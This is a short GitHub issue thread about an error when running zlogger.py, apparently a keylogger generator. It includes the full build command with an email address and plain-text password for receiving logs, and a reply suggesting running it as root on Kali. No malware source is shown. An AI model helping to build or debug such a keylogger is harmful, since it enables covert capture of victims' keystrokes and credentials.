### ISSUE TITLE
error while while running zlogger.py

### ISSUE THREAD

**Issue by ravikiran152005** [z00z/ZLogger#10]
python zlogger.py -i 60 -l -e zlogger9090@gmail.com -p Zlogger@1234 -o keylogger
Traceback (most recent call last):
  File "zlogger.py", line 36, in <module>
    create_keylogger(arguments.out, arguments.interval, arguments.email, arguments.password)
  File "zlogger.py", line 23, in create_keylogger
    with open(file_name, "w+") as file:
IOError: [Errno 13] Permission denied: 'keylogger'

**Comment by ravikiran152005** [comment]
while running bash install.sh I got this message “python 2.17.5 permission denied

**Comment by ShadowSlayer03** [comment]
Did you give root access to kali on terminal while running the Zlogger? Also If the problem lies in your zlogger.py file then u could open it download it alone from "Code" section and then use any text editor to copy paste the zlogger.py into the already existing one.
This solved the issue that I had in one of the tools I was using so I just suggested.
